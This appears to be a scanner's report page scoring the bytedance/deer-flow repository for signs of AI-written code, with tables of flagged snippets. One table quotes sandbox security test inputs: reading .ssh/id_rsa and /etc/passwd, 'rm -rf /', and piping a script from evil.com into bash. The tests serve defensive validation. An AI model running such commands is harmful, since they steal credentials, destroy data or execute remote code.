Home / bytedance / deer-flow
Repository Analysis

bytedance/deer-flow

An open-source long-horizon SuperAgent harness that researches, codes, and creates. With the help of sandboxes, memories, tools, skill, subagents and message gateway, it handles different levels of tasks that could take minutes to hours.

37.7 Strong AI signal View on GitHub
37.7
Adjusted Score
37.7
Raw Score
100%
Time Factor
2026-05-29
Last Push
69,980
Stars
Python
Language
235,667
Lines of Code
1048
Files
5782
Pattern Hits
2026-05-31
Scan Date

Score History

Severity Breakdown

CRITICAL 1HIGH 87MEDIUM 1154LOW 4540

Pattern Findings

5782 matches across 21 categories. Click a row to expand file-level details.

Decorative Section Separators1070 hits · 3837 pts
SeverityFileLineSnippet
MEDIUMconfig.example.yaml13# ============================================================================
MEDIUMconfig.example.yaml15# ============================================================================
MEDIUMconfig.example.yaml20# ============================================================================
MEDIUMconfig.example.yaml22# ============================================================================
MEDIUMconfig.example.yaml26# ============================================================================
MEDIUMconfig.example.yaml28# ============================================================================
MEDIUMconfig.example.yaml35# ============================================================================
MEDIUMconfig.example.yaml37# ============================================================================
MEDIUMconfig.example.yaml391# ============================================================================
MEDIUMconfig.example.yaml393# ============================================================================
MEDIUMconfig.example.yaml402# ============================================================================
MEDIUMconfig.example.yaml404# ============================================================================
MEDIUMconfig.example.yaml535# ============================================================================
MEDIUMconfig.example.yaml537# ============================================================================
MEDIUMconfig.example.yaml547# ============================================================================
MEDIUMconfig.example.yaml549# ============================================================================
MEDIUMconfig.example.yaml834# ============================================================================
MEDIUMconfig.example.yaml836# ============================================================================
MEDIUMconfig.example.yaml845# ============================================================================
MEDIUMconfig.example.yaml847# ============================================================================
MEDIUMconfig.example.yaml921# ============================================================================
MEDIUMconfig.example.yaml923# ============================================================================
MEDIUMconfig.example.yaml929# ============================================================================
MEDIUMconfig.example.yaml931# ============================================================================
MEDIUMconfig.example.yaml937# ============================================================================
MEDIUMconfig.example.yaml939# ============================================================================
MEDIUMconfig.example.yaml575# ============================================================================
MEDIUMconfig.example.yaml577# ============================================================================
MEDIUMconfig.example.yaml598# ============================================================================
MEDIUMconfig.example.yaml600# ============================================================================
MEDIUMconfig.example.yaml633# ============================================================================
MEDIUMconfig.example.yaml635# ============================================================================
MEDIUMconfig.example.yaml731# ============================================================================
MEDIUMconfig.example.yaml733# ============================================================================
MEDIUMconfig.example.yaml783# ============================================================================
MEDIUMconfig.example.yaml785# ============================================================================
MEDIUMconfig.example.yaml811# ============================================================================
MEDIUMconfig.example.yaml813# ============================================================================
MEDIUMconfig.example.yaml906# ============================================================================
MEDIUMconfig.example.yaml908# ============================================================================
MEDIUMconfig.example.yaml956# ============================================================================
MEDIUMconfig.example.yaml958# ============================================================================
MEDIUMconfig.example.yaml1009# ============================================================================
MEDIUMconfig.example.yaml1011# ============================================================================
MEDIUMconfig.example.yaml1027# ============================================================================
MEDIUMconfig.example.yaml1029# ============================================================================
MEDIUMconfig.example.yaml1142# ============================================================================
MEDIUMconfig.example.yaml1144# ============================================================================
MEDIUMconfig.example.yaml1177# ============================================================================
MEDIUMconfig.example.yaml1179# ============================================================================
MEDIUMdocker/docker-compose.yaml27 # ── Reverse Proxy ──────────────────────────────────────────────────────────
MEDIUMdocker/docker-compose.yaml45 # ── Frontend: Next.js Production ───────────────────────────────────────────
MEDIUMdocker/docker-compose.yaml64 # ── Gateway API ────────────────────────────────────────────────────────────
MEDIUMdocker/docker-compose.yaml118 # ── Sandbox Provisioner (optional, Kubernetes mode) ────────────────────────
MEDIUMdocker/docker-compose-dev.yaml16 # ── Sandbox Provisioner ────────────────────────────────────────────────
MEDIUMdocker/docker-compose-dev.yaml62 # ── Reverse Proxy ──────────────────────────────────────────────────────
MEDIUMdocker/dev-entrypoint.sh38# ── Resolve extras ──────────────────────────────────────────────────────────
MEDIUMdocker/dev-entrypoint.sh67# ── Sync dependencies (with self-heal) ──────────────────────────────────────
MEDIUMdocker/dev-entrypoint.sh81# ── Hand off to uvicorn ─────────────────────────────────────────────────────
MEDIUMdocker/provisioner/app.py54# ── Configuration (all tuneable via environment variables) ───────────────
1010 more matches not shown…
Hyper-Verbose Identifiers3484 hits · 3326 pts
SeverityFileLineSnippet
LOWfrontend/src/core/settings/store.ts41function ensureStorageListenerRegistered() {
LOWfrontend/src/core/artifacts/loader.ts27export function loadArtifactContentFromToolCall({
LOWfrontend/src/core/artifacts/utils.ts25export function extractArtifactsFromThread(thread: AgentThread) {
LOWfrontend/src/core/artifacts/preview.ts81export function buildWriteFileDraftContent({
LOWfrontend/src/core/artifacts/preview.ts167export function appendHtmlPreviewBaseHref(
LOWfrontend/src/core/artifacts/preview.ts199export function createHtmlPreviewScrollKey(value: string) {
LOWfrontend/src/core/artifacts/preview.ts215function htmlScrollRestorationScript(messageKey: string) {
LOWfrontend/src/core/artifacts/preview.ts258export function appendHtmlPreviewScrollRestoration(
LOWfrontend/src/core/messages/usage-model.ts88export function tokenUsagePreferencesFromPreset(
LOWfrontend/src/core/messages/usage-model.ts212function buildActionLabelsFromAttribution(
LOWfrontend/src/core/messages/usage-model.ts221function describeAttributionAction(
LOWfrontend/src/core/messages/usage-model.ts307function normalizeTokenUsageAttribution(
LOWfrontend/src/core/messages/usage-model.ts345function normalizeTokenUsageAttributionAction(
LOWfrontend/src/core/messages/usage-model.ts430function isTokenUsageAttributionKind(
LOWfrontend/src/core/messages/utils.ts139export function getAssistantTurnUsageMessages(groups: MessageGroup[]) {
LOWfrontend/src/core/messages/utils.ts183export function getStreamingMessageLookup(
LOWfrontend/src/core/messages/utils.ts215export function isAssistantMessageGroupStreaming(
LOWfrontend/src/core/messages/utils.ts309function splitInlineReasoningFromAIMessage(message: Message) {
LOWfrontend/src/core/messages/utils.ts316export function extractContentFromMessage(message: Message) {
LOWfrontend/src/core/messages/utils.ts342export function extractReasoningContentFromMessage(message: Message) {
LOWfrontend/src/core/messages/utils.ts364export function removeReasoningContentFromMessage(message: Message) {
LOWfrontend/src/core/messages/utils.ts371export function extractURLFromImageURLContent(
LOWfrontend/src/core/messages/utils.ts430export function isClarificationToolMessage(message: Message) {
LOWfrontend/src/core/messages/utils.ts434export function extractPresentFilesFromMessage(message: Message) {
LOWfrontend/src/core/agents/api.ts34function isAgentsApiDisabledDetail(detail: string | undefined): boolean {
LOWfrontend/src/core/uploads/file-validation.ts16export function splitUnsupportedUploadFiles(fileList: File[] | FileList) {
LOWfrontend/src/core/uploads/prompt-input-files.ts8export async function promptInputFilePartToFile(
LOWfrontend/src/core/utils/files.tsx173export function getFileExtensionDisplayName(filepath: string) {
LOWfrontend/src/core/blog/index.ts119function collectLocalizedBlogPosts(
LOWfrontend/src/core/threads/token-usage.ts9export function threadTokenUsageToTokenUsage(
LOWfrontend/src/core/threads/hooks.ts109function findLatestUnloadedRunIndex(
LOWfrontend/src/core/threads/hooks.ts172export function getVisibleOptimisticMessages(
LOWfrontend/src/core/threads/hooks.ts186export function getSummarizationMiddlewareMessages(
LOWfrontend/src/core/threads/hooks.ts210export function upsertThreadInSearchCache(
LOWfrontend/src/core/rehype/index.ts9export function rehypeSplitWordsIntoSpans() {
LOWfrontend/src/core/rehype/index.ts50export function useRehypeSplitWordsIntoSpans(enabled = true) {
LOWfrontend/src/core/api/stream-mode.ts15export function warnUnsupportedStreamModes(
LOWfrontend/src/core/i18n/cookies.ts43export async function getLocaleFromCookieServer(): Promise<string | null> {
LOWfrontend/src/core/streamdown/preprocess.ts5export function preprocessStreamdownMarkdown(markdown: string): string {
LOW…rc/components/landing/progressive-skills-animation.tsx64export default function ProgressiveSkillsAnimation() {
LOW…end/src/components/workspace/token-usage-indicator.tsx159function presetKeyToTranslationKey(preset: TokenUsageViewPreset) {
LOW…components/workspace/settings/memory-settings-page.tsx412 async function handleImportFileSelection(event: {
LOW…nd/src/components/workspace/messages/message-group.tsx368function shouldInlineThinkingToken({
LOW…/components/workspace/messages/message-token-usage.tsx84export function MessageTokenUsageDebugList({
LOWbackend/CONTRIBUTING.md229def test_create_chat_model_with_valid_name():
LOWbackend/CONTRIBUTING.md234def test_create_chat_model_with_invalid_name():
LOWbackend/app/gateway/deps.py46async def _mark_latest_recovered_threads_error(
LOWbackend/app/gateway/deps.py273async def get_current_user_from_request(request: Request):
LOWbackend/app/gateway/deps.py313async def get_optional_user_from_request(request: Request):
LOWbackend/app/gateway/services.py139def merge_run_context_overrides(config: dict[str, Any], context: Mapping[str, Any] | None) -> None:
LOWbackend/app/gateway/services.py156def inject_authenticated_user_context(config: dict[str, Any], request: Request) -> None:
LOWbackend/app/gateway/csrf_middleware.py109def get_configured_cors_origins() -> set[str]:
LOWbackend/app/gateway/internal_auth.py15def _load_internal_auth_token() -> str:
LOWbackend/app/gateway/internal_auth.py25def create_internal_auth_headers() -> dict[str, str]:
LOWbackend/app/gateway/internal_auth.py30def is_valid_internal_auth_token(token: str | None) -> bool:
LOWbackend/app/gateway/app.py143async def _migrate_orphaned_threads(store, admin_user_id: str) -> int:
LOWbackend/app/gateway/path_utils.py11def resolve_thread_virtual_path(thread_id: str, virtual_path: str) -> Path:
LOWbackend/app/gateway/routers/auth.py94def _validate_strong_password(value: str) -> str:
LOWbackend/app/gateway/routers/suggestions.py33def _strip_markdown_code_fence(text: str) -> str:
LOWbackend/app/gateway/routers/memory.py66def _map_memory_fact_value_error(exc: ValueError) -> HTTPException:
3424 more matches not shown…
Unused Imports423 hits · 408 pts
SeverityFileLineSnippet
LOWdocker/provisioner/app.py30
LOWbackend/app/gateway/deps.py18
LOWbackend/app/gateway/services.py8
LOWbackend/app/gateway/__init__.py1
LOWbackend/app/gateway/__init__.py1
LOWbackend/app/gateway/__init__.py2
LOWbackend/app/gateway/__init__.py2
LOWbackend/app/gateway/internal_auth.py3
LOWbackend/app/gateway/authz.py30
LOWbackend/app/gateway/routers/thread_runs.py12
LOWbackend/app/gateway/routers/feedback.py7
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/__init__.py1
LOWbackend/app/gateway/routers/assistants_compat.py10
LOWbackend/app/gateway/routers/threads.py13
LOWbackend/app/gateway/routers/channels.py3
LOWbackend/app/gateway/routers/runs.py8
LOWbackend/app/gateway/auth/__init__.py9
LOWbackend/app/gateway/auth/__init__.py9
LOWbackend/app/gateway/auth/__init__.py9
LOWbackend/app/gateway/auth/__init__.py10
LOWbackend/app/gateway/auth/__init__.py10
LOWbackend/app/gateway/auth/__init__.py10
LOWbackend/app/gateway/auth/__init__.py11
LOWbackend/app/gateway/auth/__init__.py11
LOWbackend/app/gateway/auth/__init__.py11
LOWbackend/app/gateway/auth/__init__.py12
LOWbackend/app/gateway/auth/__init__.py13
LOWbackend/app/gateway/auth/__init__.py13
LOWbackend/app/gateway/auth/__init__.py14
LOWbackend/app/gateway/auth/__init__.py14
LOWbackend/app/gateway/auth/__init__.py15
LOWbackend/app/gateway/auth/__init__.py16
LOWbackend/app/gateway/auth/providers.py24
LOWbackend/app/gateway/auth/credential_file.py11
LOWbackend/app/gateway/auth/reset_admin.py12
LOWbackend/app/gateway/auth/repositories/sqlite.py13
LOWbackend/app/channels/store.py3
LOWbackend/app/channels/service.py3
LOWbackend/app/channels/message_bus.py3
LOWbackend/app/channels/dingtalk.py3
LOWbackend/app/channels/telegram.py3
LOWbackend/app/channels/discord.py3
LOWbackend/app/channels/__init__.py8
LOWbackend/app/channels/__init__.py9
LOWbackend/app/channels/__init__.py9
LOWbackend/app/channels/__init__.py9
LOWbackend/app/channels/wechat.py3
LOWbackend/app/channels/feishu.py3
LOWbackend/app/channels/commands.py9
LOWbackend/app/channels/manager.py3
LOWbackend/app/channels/base.py3
LOWbackend/app/channels/slack.py3
363 more matches not shown…
Excessive Try-Catch Wrapping353 hits · 362 pts
SeverityFileLineSnippet
LOWdocker/provisioner/app.py119 except Exception as exc:
LOWdocker/provisioner/app.py129 except Exception as exc:
LOWbackend/debug.py89 except Exception as e:
LOWbackend/debug.py160 except Exception as e:
LOWbackend/app/gateway/deps.py59 except Exception:
LOWbackend/app/gateway/deps.py66 except Exception:
LOWbackend/app/gateway/deps.py91 except Exception as exc: # noqa: BLE001 - request boundary: log and degrade gracefully
LOWbackend/app/gateway/services.py333 except Exception:
LOWbackend/app/gateway/app.py119 except Exception:
LOWbackend/app/gateway/app.py175 except Exception as e:
LOWbackend/app/gateway/app.py196 except Exception:
LOWbackend/app/gateway/app.py214 except Exception:
LOWbackend/app/gateway/routers/suggestions.py52 except Exception:
LOWbackend/app/gateway/routers/suggestions.py139 except Exception as exc:
LOWbackend/app/gateway/routers/skills.py98 except Exception as e:
LOWbackend/app/gateway/routers/skills.py123 except Exception as e:
LOWbackend/app/gateway/routers/skills.py133 except Exception as e:
LOWbackend/app/gateway/routers/skills.py149 except Exception as e:
LOWbackend/app/gateway/routers/skills.py186 except Exception as e:
LOWbackend/app/gateway/routers/skills.py214 except Exception as e:
LOWbackend/app/gateway/routers/skills.py229 except Exception as e:
LOWbackend/app/gateway/routers/skills.py276 except Exception as e:
LOWbackend/app/gateway/routers/skills.py299 except Exception as e:
LOWbackend/app/gateway/routers/skills.py350 except Exception as e:
LOWbackend/app/gateway/routers/thread_runs.py195 except Exception:
LOWbackend/app/gateway/routers/agents.py124 except Exception as e:
LOWbackend/app/gateway/routers/agents.py186 except Exception as e:
LOWbackend/app/gateway/routers/agents.py251 except Exception as e:
LOWbackend/app/gateway/routers/agents.py340 except Exception as e:
LOWbackend/app/gateway/routers/agents.py377 except Exception as e:
LOWbackend/app/gateway/routers/agents.py405 except Exception as e:
LOWbackend/app/gateway/routers/agents.py444 except Exception as e:
LOWbackend/app/gateway/routers/assistants_compat.py82 except Exception:
LOWbackend/app/gateway/routers/threads.py180 except Exception as exc:
LOWbackend/app/gateway/routers/threads.py232 except Exception:
LOWbackend/app/gateway/routers/threads.py240 except Exception:
LOWbackend/app/gateway/routers/threads.py281 except Exception:
LOWbackend/app/gateway/routers/threads.py297 except Exception:
LOWbackend/app/gateway/routers/threads.py362 except Exception:
LOWbackend/app/gateway/routers/threads.py397 except Exception:
LOWbackend/app/gateway/routers/threads.py448 except Exception:
LOWbackend/app/gateway/routers/threads.py516 except Exception:
LOWbackend/app/gateway/routers/threads.py550 except Exception:
LOWbackend/app/gateway/routers/threads.py565 except Exception:
LOWbackend/app/gateway/routers/threads.py644 except Exception:
LOWbackend/app/gateway/routers/mcp.py286 except Exception as e:
LOWbackend/app/gateway/routers/artifacts.py46 except Exception:
LOWbackend/app/gateway/routers/uploads.py119 except Exception:
LOWbackend/app/gateway/routers/uploads.py138 except Exception:
LOWbackend/app/gateway/routers/uploads.py162 except Exception:
LOWbackend/app/gateway/routers/uploads.py185 except Exception:
LOWbackend/app/gateway/routers/uploads.py293 except Exception as e:
LOWbackend/app/gateway/routers/uploads.py369 except Exception as e:
LOWbackend/app/gateway/routers/runs.py85 except Exception:
LOWbackend/app/gateway/auth/local_provider.py54 except Exception:
MEDIUMbackend/app/gateway/auth/reset_admin.py40 print("Error: persistence engine not available (check config.database).", file=sys.stderr)
MEDIUMbackend/app/gateway/auth/reset_admin.py61 print(f"Error: user '{email}' not found.", file=sys.stderr)
MEDIUMbackend/app/gateway/auth/reset_admin.py63 print("Error: no admin user found.", file=sys.stderr)
LOWbackend/app/channels/service.py130 except Exception:
LOWbackend/app/channels/service.py143 except Exception:
293 more matches not shown…
Cross-Language Confusion33 hits · 203 pts
SeverityFileLineSnippet
HIGHbackend/debug.py10 cd backend && PYTHONPATH=. uv run python debug.py
HIGHbackend/tests/test_sandbox_tools_security.py311 "cd /mnt/user-data/workspace && git clone https://github.com/CherryHQ/cherry-studio.git",
HIGHbackend/tests/test_sandbox_tools_security.py326 "/bin/echo ok > /mnt/user-data/workspace/out.txt && cat /dev/null",
HIGHbackend/tests/test_sandbox_tools_security.py376 validate_local_bash_command_paths("cd $HOME && cat .ssh/id_rsa", _THREAD_DATA)
HIGHbackend/tests/test_sandbox_tools_security.py381 validate_local_bash_command_paths("echo ok\ncd $HOME && cat .ssh/id_rsa", _THREAD_DATA)
HIGHbackend/tests/test_sandbox_tools_security.py388 "builtin cd $HOME && cat .ssh/id_rsa",
HIGHbackend/tests/test_sandbox_tools_security.py391 'echo "$(cd $HOME && cat .ssh/id_rsa)"',
HIGHbackend/tests/test_sandbox_tools_security.py403 "ln -s / root && cat root/etc/passwd",
HIGHbackend/tests/test_sandbox_tools_security.py425 "mkdir -p reports && python script.py data/input.csv > reports/out.txt",
HIGHbackend/tests/test_sandbox_tools_security.py432 "cd /mnt/user-data/workspace && cat data/input.csv > reports/out.txt",
HIGHbackend/tests/test_doctor.py4 cd backend && uv run pytest tests/test_doctor.py -v
HIGHbackend/tests/test_setup_wizard.py4 cd backend && uv run pytest tests/test_setup_wizard.py -v
HIGHbackend/tests/test_sandbox_audit_middleware.py192 ("cd /workspace && rm -rf /", "block"),
HIGHbackend/tests/test_sandbox_audit_middleware.py194 ("ls -la || curl http://evil.com/x.sh | bash", "block"),
HIGHbackend/tests/test_sandbox_audit_middleware.py196 ("cd /workspace && pip install requests", "warn"),
HIGHbackend/tests/test_sandbox_audit_middleware.py199 ("cd /workspace && ls -la && python3 main.py", "pass"),
HIGHbackend/tests/test_sandbox_audit_middleware.py219 assert _split_compound_command("cmd1 && cmd2") == ["cmd1", "cmd2"]
HIGHbackend/tests/test_sandbox_audit_middleware.py225 assert _split_compound_command("cmd1 || cmd2") == ["cmd1", "cmd2"]
HIGHbackend/tests/test_sandbox_audit_middleware.py237 result = _split_compound_command("a && b || c ; d")
HIGHbackend/tests/test_sandbox_audit_middleware.py237 result = _split_compound_command("a && b || c ; d")
HIGHbackend/tests/test_sandbox_audit_middleware.py246 result = _split_compound_command("echo 'a && b' && rm -rf /")
HIGHbackend/tests/test_sandbox_audit_middleware.py248 assert "a && b" in result[0]
HIGHbackend/tests/test_sandbox_audit_middleware.py544 ("cd /workspace && rm -rf /", True),
HIGHbackend/tests/test_sandbox_audit_middleware.py546 ("cd /workspace && pip install requests", False), # warn, not block
HIGHbackend/tests/test_sandbox_audit_middleware.py547 ("cd /workspace && ls -la && python3 main.py", False), # all safe
HIGHbackend/tests/test_sandbox_audit_middleware.py168 "cd /mnt/user-data/workspace && python3 main.py",
HIGHbackend/tests/test_sandbox_audit_middleware.py689 "cd /mnt/user-data/workspace && python3 main.py",
HIGHbackend/tests/test_gateway_services.py455 """When caller sends context=null, treat it as an empty context object."""
HIGHbackend/packages/harness/deerflow/runtime/converters.py27 - AIMessage (with tool_calls) → {"role": "assistant", "content": null, "tool_calls": [...]}
HIGH…eerflow/agents/middlewares/sandbox_audit_middleware.py171 2. Then split compound commands (e.g. ``cmd1 && cmd2 ; cmd3``) and
HIGHbackend/packages/harness/deerflow/sandbox/tools.py943 and device references (e.g. /bin/sh, /dev/null).
HIGHbackend/packages/harness/deerflow/persistence/engine.py87 " cd backend && uv sync --all-packages --extra postgres\n"
HIGHscripts/doctor.py372 fix=f"cd backend && uv add {pip_name}",
Docstring Block Structure36 hits · 180 pts
SeverityFileLineSnippet
HIGHbackend/CONTRIBUTING.md155Create a chat model instance from configuration. Args: name: The model name as defined in config.yaml
HIGHbackend/app/gateway/path_utils.py12Resolve a virtual path to the actual filesystem path under thread user-data. Args: thread_id: The thread ID
HIGHbackend/app/gateway/routers/models.py100Get a specific model by name. Args: model_name: The unique name of the model to retrieve. Returns:
HIGHbackend/app/gateway/routers/agents.py135Check whether an agent name is valid and not yet taken. Args: name: The agent name to check. Returns:
HIGHbackend/app/gateway/routers/agents.py165Get a specific custom agent by name. Args: name: The agent name. Returns: Agent details includ
HIGHbackend/app/gateway/routers/agents.py199Create a new custom agent. Args: request: The agent creation request. Returns: The created age
HIGHbackend/app/gateway/routers/agents.py266Update an existing custom agent. Args: name: The agent name. request: The update request (all field
HIGHbackend/app/gateway/routers/mcp.py199Update the MCP configuration. This will: 1. Save the new configuration to the mcp_config.json file 2. Reloa
HIGHbackend/app/gateway/routers/artifacts.py106Get an artifact file by its path. The endpoint automatically detects file types and returns appropriate content typ
HIGHbackend/app/gateway/auth/repositories/base.py27Create a new user. Args: user: User object to create Returns: Created User wit
HIGHbackend/app/gateway/auth/repositories/base.py66Update an existing user. Args: user: User object with updated fields Returns:
HIGHbackend/packages/harness/deerflow/client.py942Update MCP server configurations. Writes to extensions_config.json and reloads the cache. Args:
HIGHbackend/packages/harness/deerflow/client.py1002Update a skill's enabled status. Args: name: Skill name. enabled: New enabled status.
HIGHbackend/packages/harness/deerflow/client.py1052Install a skill from a .skill archive (ZIP). Args: skill_path: Path to the .skill file. Re
HIGHbackend/packages/harness/deerflow/client.py1150Upload local files into a thread's uploads directory. For PDF, PPT, Excel, and Word files, they are also conver
HIGHbackend/packages/harness/deerflow/client.py1263Delete a file from a thread's uploads directory. Args: thread_id: Thread ID. filename:
HIGHbackend/packages/harness/deerflow/client.py1287Read an artifact file produced by the agent. Args: thread_id: Thread ID. path: Virtual
HIGHbackend/packages/harness/deerflow/tools/sync.py39Build a synchronous wrapper for an asynchronous tool coroutine. Args: coro: Async callable backing a LangCh
HIGH…kend/packages/harness/deerflow/config/agents_config.py81Load the custom or default agent's config from its directory. Reads from the per-user layout first; falls back to t
HIGHbackend/packages/harness/deerflow/config/paths.py292Resolve a sandbox virtual path to the actual host filesystem path. Args: thread_id: The thread ID.
HIGH…end/packages/harness/deerflow/agents/memory/updater.py62Persist imported memory data via storage provider. Args: memory_data: Full memory payload to persist.
HIGHbackend/packages/harness/deerflow/uploads/manager.py54Sanitize a filename by extracting its basename. Strips any directory components and rejects traversal patterns.
HIGHbackend/packages/harness/deerflow/uploads/manager.py254Delete a file inside *base_dir* after path-traversal validation. If *convertible_extensions* is provided and the fi
HIGHbackend/packages/harness/deerflow/utils/network.py59Allocate an available port in a thread-safe manner. This method is thread-safe. It finds an available port, mar
HIGHbackend/packages/harness/deerflow/utils/network.py114Get a free port in a thread-safe manner. This function uses a global port allocator to ensure that concurrent calls
HIGHbackend/packages/harness/deerflow/sandbox/tools.py136Resolve a virtual skills path to a host filesystem path. Args: path: Virtual skills path (e.g. /mnt/skills/
HIGHbackend/packages/harness/deerflow/sandbox/tools.py271Resolve a virtual ACP workspace path to a host filesystem path. Args: path: Virtual path (e.g. /mnt/acp-wor
HIGHbackend/packages/harness/deerflow/sandbox/tools.py1095Ensure sandbox is initialized, acquiring lazily if needed. On first call, acquires a sandbox from the provider and
HIGHbackend/packages/harness/deerflow/sandbox/sandbox.py44Download the binary content of a file. Args: path: The absolute path of the file to download.
HIGH…arness/deerflow/community/aio_sandbox/local_backend.py245Start a new container and return its connection info. Args: thread_id: Thread ID for which the sand
HIGH…arness/deerflow/community/aio_sandbox/local_backend.py491Start a new container. Args: container_name: Name for the container. port: Host port to
HIGH…deerflow/community/aio_sandbox/aio_sandbox_provider.py721Create a new sandbox via the backend. Args: thread_id: Optional thread ID. sandbox_id:
HIGH…kend/packages/harness/deerflow/reflection/resolvers.py29Resolve a variable from a path. Args: variable_path: The path to the variable (e.g. "parent_package_name.su
HIGH…kend/packages/harness/deerflow/reflection/resolvers.py74Resolve a class from a module path and class name. Args: class_path: The path to the class (e.g. "langchain
HIGHdocs/SKILL_NAME_CONFLICT_FIX.md214Find a skill by name, optionally filtered by category. Args: skills: List of all skills skill_n
HIGHskills/public/code-documentation/SKILL.md273Process data from the given file path. Reads the input file, applies transformations based on the provided opti
Deep Nesting132 hits · 121 pts
SeverityFileLineSnippet
LOWbackend/debug.py63
LOWbackend/app/gateway/services.py79
LOWbackend/app/gateway/services.py188
LOWbackend/app/gateway/routers/auth.py188
LOWbackend/app/gateway/routers/auth.py398
LOWbackend/app/gateway/routers/suggestions.py67
LOWbackend/app/gateway/routers/mcp.py198
LOWbackend/app/gateway/routers/artifacts.py66
LOWbackend/app/gateway/routers/uploads.py191
LOWbackend/app/channels/dingtalk.py81
LOWbackend/app/channels/telegram.py132
LOWbackend/app/channels/discord.py250
LOWbackend/app/channels/wechat.py545
LOWbackend/app/channels/wechat.py942
LOWbackend/app/channels/feishu.py269
LOWbackend/app/channels/feishu.py511
LOWbackend/app/channels/feishu.py585
LOWbackend/app/channels/manager.py149
LOWbackend/app/channels/manager.py205
LOWbackend/app/channels/manager.py297
LOWbackend/app/channels/manager.py839
LOWbackend/app/channels/manager.py947
LOWbackend/app/channels/base.py91
LOWbackend/app/channels/wecom.py183
LOWbackend/app/channels/wecom.py296
LOWbackend/tests/test_client_e2e.py191
LOWbackend/tests/test_harness_boundary.py18
LOWbackend/tests/test_runtime_lifecycle_e2e.py343
LOWbackend/tests/test_claude_provider_prompt_caching.py28
LOWbackend/tests/blocking_io/test_skills_load.py46
LOWbackend/tests/support/detectors/blocking_io_static.py611
LOWbackend/tests/support/detectors/blocking_io_static.py651
LOWbackend/tests/support/detectors/blocking_io_static.py753
LOWbackend/tests/support/detectors/thread_boundaries.py429
LOWbackend/packages/harness/deerflow/client.py361
LOWbackend/packages/harness/deerflow/client.py401
LOWbackend/packages/harness/deerflow/client.py503
LOWbackend/packages/harness/deerflow/client.py1149
LOWbackend/packages/harness/deerflow/tracing/factory.py32
LOWbackend/packages/harness/deerflow/tools/tools.py44
LOW…/packages/harness/deerflow/tools/builtins/task_tool.py187
LOW…rness/deerflow/tools/builtins/invoke_acp_agent_tool.py61
LOW…rness/deerflow/tools/builtins/invoke_acp_agent_tool.py97
LOWbackend/packages/harness/deerflow/subagents/executor.py449
LOW…kend/packages/harness/deerflow/config/agents_config.py154
LOW…/packages/harness/deerflow/config/extensions_config.py72
LOWbackend/packages/harness/deerflow/config/app_config.py116
LOWbackend/packages/harness/deerflow/runtime/journal.py100
LOWbackend/packages/harness/deerflow/runtime/journal.py180
LOWbackend/packages/harness/deerflow/runtime/journal.py230
LOWbackend/packages/harness/deerflow/runtime/journal.py319
LOW…kages/harness/deerflow/runtime/stream_bridge/memory.py85
LOW…ackages/harness/deerflow/runtime/events/store/jsonl.py68
LOW…ckend/packages/harness/deerflow/runtime/runs/worker.py124
LOWbackend/packages/harness/deerflow/agents/factory.py306
LOW…ckend/packages/harness/deerflow/agents/memory/queue.py166
LOW…end/packages/harness/deerflow/agents/memory/updater.py150
LOW…end/packages/harness/deerflow/agents/memory/updater.py193
LOW…end/packages/harness/deerflow/agents/memory/updater.py600
LOW…s/harness/deerflow/agents/memory/message_processing.py40
72 more matches not shown…
AI Slop Vocabulary52 hits · 114 pts
SeverityFileLineSnippet
MEDIUMconfig.example.yaml94 # Install: cd backend && uv pip install 'deerflow-harness[ollama]'
MEDIUMdocker/dev-entrypoint.sh12# 3. `uv sync --all-packages` so workspace member extras (deerflow-harness's
LOW…reads/4f3e55ee-f853-43db-bfb3-7d1a411f03cb/thread.json168 "content": "---\nname: video-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/4f3e55ee-f853-43db-bfb3-7d1a411f03cb/thread.json365 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json307 "content": "[\n {\n \"title\": \"Startup Industry Trends in 2026 - Qubit Capital\",\n \"url\": \"https://
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json383 "content": "# The AI advantage dilemma: Security risks and opportunities that lie ahead\n\nEscalating the AI arm
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json483 "content": "Based on current research and expert predictions, 2026 appears to be a pivotal year shaped by accele
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json483 "content": "Based on current research and expert predictions, 2026 appears to be a pivotal year shaped by accele
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json550 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json753 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json753 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json753 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json753 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json1376 "content": "I've created a modern, minimalist website showcasing the 2026 trends and opportunities analysis. The
MEDIUM…reads/3823e443-4e2b-4679-b496-a9506eae462b/thread.json563 "content": "[\n {\n \"title\": \"Fei-Fei Li on spatial intelligence and human-centered AI - IMDb\",\n \"u
MEDIUM…reads/3823e443-4e2b-4679-b496-a9506eae462b/thread.json563 "content": "[\n {\n \"title\": \"Fei-Fei Li on spatial intelligence and human-centered AI - IMDb\",\n \"u
MEDIUM…reads/d3e5adaf-084c-4dd5-9d29-94f1d6bccd98/thread.json53 "content": "# Tips For Technical Startup Founders | Startup School\n\n# Tips For Technical Startup Founders | St
